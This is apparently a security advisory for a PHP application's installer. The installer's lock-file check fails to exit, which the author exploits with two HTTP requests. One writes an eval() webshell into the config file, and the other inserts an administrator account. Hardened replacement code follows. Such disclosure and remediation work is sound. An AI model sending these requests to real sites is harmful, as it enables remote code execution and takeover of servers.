The problem is in /install/index.php. Once the application has been installed, an install.lock file is created in the application root, but /install/index.php gets the check for that lock file wrong:
<?php
if(file_exists("../install.lock"))
{
    header("Location: ../");//no exit here!
}

//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
As you can see, when install.lock exists the script only emits a 302 redirect via header() and never exits, so everything below the guard still executes for whoever ignores the redirect. A non-destructive way to confirm this: request /install/index.php with redirect-following disabled; if the 302 response body still carries the step-1 installer page, the guard is being bypassed. From here at least two vulnerabilities follow.

1. getshell (very dangerous)
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
    $smarty->assign("step",1);
    $smarty->display("index.html");
}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']);//sic: "==" is a comparison, so $domain is never assigned and DOMAIN is written empty
    $str="<?php \r\n";
    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str);//writes the submitted values straight into a PHP file
The code above writes the POST data directly into ../config/config.inc.php without any quoting, so a double quote in a field closes the string literal and the rest of the field becomes PHP code. Submitting the following POST request therefore gives us a one-line webshell:
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
This method is dangerous, though: config.inc.php is overwritten with bogus database settings, and the injected "?>" ends PHP mode, so the constants written after it are never defined and the site stops working.
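To make the injection concrete, here is an added example (not the project's code) that rebuilds the step=2 config writer as a function, puts a hardened writer beside it, and runs both on the form fields from the request above as constructed input. The guard function, the function names and the whitelist regex are this example's own choices; the constant names and file layout are taken from the original code.

```php
<?php
// Added example, not code from the project. The vulnerable writer is the
// original concatenation from the step=2 branch; the hardened one is an
// example replacement. Function names and validation rules are assumptions.

// The guard the installer needed: redirect AND stop. Without the exit,
// every step branch below still runs for anyone who ignores the 302.
function requireNotInstalled(string $lockFile): void
{
    if (file_exists($lockFile)) {
        header('Location: ../', true, 302);
        exit;
    }
}

// Same concatenation as the original: a double quote in any field closes
// the PHP string literal, and "?>" ends the PHP block for everything after.
function buildConfigVulnerable(array $post): string
{
    $str  = "<?php \r\n";
    $str .= 'define("MYSQL_HOST","' . trim($post['mysql_host']) . '");' . "\r\n";
    $str .= 'define("MYSQL_USER","' . trim($post['mysql_user']) . '");' . "\r\n";
    $str .= 'define("MYSQL_PWD","'  . trim($post['mysql_pwd'])  . '");' . "\r\n";
    $str .= 'define("MYSQL_DB","'   . trim($post['mysql_db'])   . '");' . "\r\n";
    $str .= 'define("MYSQL_CHARSET","GBK");' . "\r\n";
    $str .= 'define("TABLE_PRE","'  . trim($post['tblpre'])     . '");' . "\r\n";
    $str .= 'define("DOMAIN","'     . trim($post['domain'])     . '");' . "\r\n";
    $str .= 'define("SKINS","default");' . "\r\n";
    $str .= '?>';
    return $str;
}

// Hardened: var_export() turns each value into a quoted PHP literal with
// quotes and backslashes escaped, so no input can leave the string; the
// fields that later become SQL identifiers are whitelisted; no closing ?>.
function buildConfigSafe(array $post): string
{
    $fields = [
        'MYSQL_HOST' => 'mysql_host', 'MYSQL_USER' => 'mysql_user',
        'MYSQL_PWD'  => 'mysql_pwd',  'MYSQL_DB'   => 'mysql_db',
        'TABLE_PRE'  => 'tblpre',     'DOMAIN'     => 'domain',
    ];
    $out = "<?php\n";
    foreach ($fields as $const => $key) {
        $value = trim((string)($post[$key] ?? ''));
        if (($key === 'mysql_db' || $key === 'tblpre')
            && !preg_match('/^[A-Za-z0-9_]{1,64}$/', $value)) {
            throw new InvalidArgumentException("invalid value for $key");
        }
        $out .= 'define(' . var_export($const, true) . ', '
              . var_export($value, true) . ");\n";
    }
    $out .= "define('MYSQL_CHARSET', 'GBK');\n";
    $out .= "define('SKINS', 'default');\n";
    return $out;
}

// Constructed input: the form fields from the step=2 request above.
$payload = [
    'mysql_host' => 'test");@eval($_POST[x]);?>//',
    'mysql_user' => '1',
    'mysql_pwd'  => '2',
    'mysql_db'   => '3',
    'tblpre'     => 'koufu_',
    'domain'     => 'www',
];

echo "--- vulnerable writer produces ---\n", buildConfigVulnerable($payload), "\n";
echo "--- hardened writer produces ---\n",   buildConfigSafe($payload);
```

The first line the vulnerable writer emits is define("MYSQL_HOST","test");@eval($_POST[x]);?>//"); which is exactly the webshell from the request, while the hardened writer emits define('MYSQL_HOST', 'test");@eval($_POST[x]);?>//'); where the whole payload stays an inert string. In the real installer, requireNotInstalled() would be the first statement of the file, before init.php is loaded.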

2. Adding an administrator directly

elseif($_REQUEST['step']==5)
{
    if($_POST)
    {
        require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
        mysql_query("SET sql_mode=''");

        $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
        {
            echo "<script>alert('Administrator name cannot be empty');history.go(-1);</script>";
            exit();
        }
        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('The two passwords do not match');history.go(-1);</script>";//no exit here either
        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//inserts a founder administrator directly; umd5() is the application's own hash helper, and $adminname is spliced into the SQL unescaped
    }
So we can insert an administrator account qingshen/qingshen directly, with the following request:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen
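For comparison, here is an added example (not the project's code) of how the step=5 handler above should have been written: the lock check terminates the request, every validation failure terminates the request, the table prefix and admin name are validated before they reach SQL, and the insert is parameterised. It assumes the mysqli extension, a lock file at ../install.lock, the admin table and columns from the INSERT above, and that the password hash is supplied as a callable so the application's own umd5() can be passed in; the "only one founder" rule and the lock-file write at the end are this example's design choices, not something the page describes.

```php
<?php
// Added example, not code from the project. Hardened replacement for the
// step=5 branch of /install/index.php. Assumptions: mysqli available,
// lock file at ../install.lock, table <prefix>admin(adminname,password,
// isfounder) as in the original INSERT, hash function passed by caller.

function createFounderAdmin(mysqli $db, string $tablePre, string $lockFile,
                            array $post, callable $hash): string
{
    // 1. Already installed? Redirect AND stop; never fall through.
    if (file_exists($lockFile)) {
        header('Location: ../', true, 302);
        exit;
    }

    $adminname = trim((string)($post['adminname'] ?? ''));
    $pwd1      = (string)($post['pwd1'] ?? '');
    $pwd2      = (string)($post['pwd2'] ?? '');

    // 2. Every validation failure ends the request. The original printed
    //    an alert for mismatched passwords and then inserted anyway.
    if (!preg_match('/^[A-Za-z0-9_]{3,20}$/', $adminname)) {
        throw new InvalidArgumentException('admin name must be 3-20 [A-Za-z0-9_]');
    }
    if ($pwd1 === '' || $pwd1 !== $pwd2) {
        throw new InvalidArgumentException('password empty or confirmation differs');
    }

    // 3. The prefix comes from config, not the request, but it is spliced
    //    into SQL as an identifier, so restrict it anyway.
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $tablePre)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    $table = $tablePre . 'admin';

    // 4. Design choice for this example: the installer creates exactly one
    //    founder, so refuse if one already exists.
    $res = $db->query("SELECT COUNT(*) FROM `$table` WHERE isfounder=1");
    if ($res === false || (int)$res->fetch_row()[0] > 0) {
        throw new RuntimeException('founder admin already present or query failed');
    }

    // 5. Parameterised insert: name and hash never become part of the SQL text.
    $stmt = $db->prepare("INSERT INTO `$table` (adminname,password,isfounder) VALUES (?,?,1)");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $hashed = $hash($pwd1);
    $stmt->bind_param('ss', $adminname, $hashed);
    if (!$stmt->execute()) {
        throw new RuntimeException('insert failed: ' . $stmt->error);
    }
    $stmt->close();

    // 6. Write the lock last, so an install that crashed before this point
    //    can be retried, while a completed one cannot be re-entered.
    file_put_contents($lockFile, date('c'));
    return $adminname;
}

// Usage inside the installer (config.inc.php must already exist):
// require_once '../config/config.inc.php';
// $db = new mysqli(MYSQL_HOST, MYSQL_USER, MYSQL_PWD, MYSQL_DB);
// $db->set_charset(MYSQL_CHARSET);
// createFounderAdmin($db, TABLE_PRE, __DIR__ . '/../install.lock', $_POST, 'umd5');
```

With this shape, replaying the step=5 request above against an installed site gets a 302 and nothing else, and a request whose pwd1 and pwd2 differ raises before any SQL runs instead of inserting the account anyway.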